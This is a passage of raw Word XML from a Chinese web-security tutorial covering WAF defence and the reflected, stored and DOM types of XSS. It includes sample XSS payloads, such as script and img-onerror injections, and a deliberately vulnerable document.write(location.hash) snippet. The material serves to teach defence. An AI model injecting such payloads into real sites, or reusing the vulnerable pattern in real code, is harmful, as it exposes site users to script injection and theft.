      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每秒</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次登录尝试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CA3D18" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机器学习：发现新型攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2496AF7E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测非常规</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D72C4C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典型防护场景：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CB29F1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>攻击请求</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>检测到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>注入特征</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>立即阻断</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>管理员收到告警</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>服务器不受影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D14BD37" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FABEFCD" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221B5907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什么是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3314F2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跨站脚本攻击（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cross-Site Scripting</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是攻击者在网页中注入恶意脚本，当其他用户访问该页面时，脚本会在受害者浏览器中执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B7529E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攻击原理（三步曲）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE954EA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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入点发现：攻击者找到网站输入点（如评论框、搜索框）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B3C80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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意脚本注入：输入包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FCA369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>&lt;HTML&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C15D3BA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 xml:space="preserve">&lt;script&gt;alert('XSS!')&lt;/script&gt; &lt;!-- </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>最简单的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XSS --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C686593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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受害者触发：当其他用户浏览该页面时，恶意脚本自动执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0DC4E4" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>攻击类型对比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47474ED9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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>反射型</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（非持久化）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A8A384" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>特点：恶意脚本在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>中，需要用户点击特定链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0195B9C7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攻击流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6804AAF5" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者构造恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161F6488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>&lt;TEXT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D606715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>https://example.com/search?q=&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>恶意代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065F7AE2" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>诱骗用户点击（如钓鱼邮件）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F9D2F2" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户浏览器执行脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661E5325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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>存储型</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（持久化）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3468AC5A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>特点：恶意脚本存储到数据库，影响所有访问者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA8C07A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攻击流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AECE29D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者在留言板提交：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBE4FCB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>&lt;HTML&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C07DF68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>&lt;img src="x" onerror="</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>窃取代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55128F9E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本存入数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C7D89" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有用户访问留言板时自动触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1408C225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3. DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>型</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0CC2F5" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>特点：完全在浏览器端发生，不经过服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A00FB7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攻击流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7287A9BB" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码有漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59876B5C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>&lt;JAVASCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2E8F26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>document.write("</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>欢迎</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>" + location.hash.substring(1));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04367FC6" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者构造</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D06FAD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>&lt;TEXT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5901CA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>https://example.com#&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>恶意代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA64FDD" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户访问时脚本执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0052B4F2" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>XSS vs SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>注入：核心区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF44B5A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
